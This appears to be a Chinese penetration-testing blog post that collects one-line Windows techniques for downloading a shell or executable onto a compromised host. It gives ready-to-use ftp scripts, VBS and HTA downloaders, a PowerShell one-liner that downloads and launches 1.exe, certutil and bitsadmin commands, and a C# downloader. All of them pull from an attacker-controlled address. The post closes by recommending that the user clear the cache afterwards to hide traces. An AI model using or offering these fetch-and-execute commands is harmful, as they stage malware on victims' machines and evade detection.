一句话下载姿势总结
在上一篇文章中,提到了下载shell的一些姿势,我们这篇文章来深入探究下。
ftp
echo open 192.168.1.1 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET 1.exe >> ftp.txt
ftp -s:ftp.txt需要搭建ftp服务器,初次使用ftp下载防火墙会弹框拦截,使用前记得要先添加防火墙规则
vbs
vbs downloader,使用msxml2.xmlhttp和adodb.stream对象
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.1/1.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\1.exe",2powershell
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'certutil
保存在当前路径,文件名称同URL
certutil.exe -urlcache -split -f http://192.168.1.1/1.exe保存在当前路径,指定保存文件名称
certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php使用downloader默认在缓存目录位置: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content保存下载的文件副本
命令行删除缓存
certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete查看缓存项目:
certutil.exe -urlcache *csc
csc.exe是微软.NET Framework 中的C#编译器,Windows系统中默认包含,可在命令行下将cs文件编译成exe
download.cs
using System.Net;
namespace downloader
{
class Program
{
static void Main(string[] args)
{
WebClient client = new WebClient();
string URLAddress = @"http://192.168.1.1/1.exe";
string receivePath = @"C:\test\";
client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
(URLAddress));
}
}
}
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\download.exe C:\test\download.cshta
添加最小化和自动退出hta程序的功能,执行过程中会最小化hta窗口,下载文件结束后自动退出hta程序
将以下代码保存为hta文件
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.1.1/1.exe",false);
Object.send();
if (Object.Status == 200)
{
var Stream = new ActiveXObject("ADODB.Stream");
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.SaveToFile("C:\\test\\1.exe", 2);
Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION
WINDOWSTATE = "minimize">
</head>
<body>
</body>
</html>bitsadmin
bitsadmin是一个命令行工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带
bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe不支持https、ftp协议,php python带的服务器会出错
写在文后,推荐使用powershell或certutil,但是记得清理缓存。
Newest Posts
- Ysoserial CommonsCollections 5 反序列化分析
- Thinkphp 源码阅读
- Thinkphp5 RCE总结
- Thinkphp3 漏洞总结
- Sqlmap Tamper 编写
- MSSQL使用CLR程序集来执行命令
- Thinkphp错误使用Upload类导致getshell
- Java 反序列化基础
- Bypass MySQL Yunsuo
- Bypass MySQL Safedog
- Metinfo7 后台注入及一些tips
- Metinfo 6.2.0正则匹配不严谨导致注入+getshell组合拳
- 广东强网杯两道Web Writeup
- Nginx Lua Backdoor
- Encrypt Reverse Shell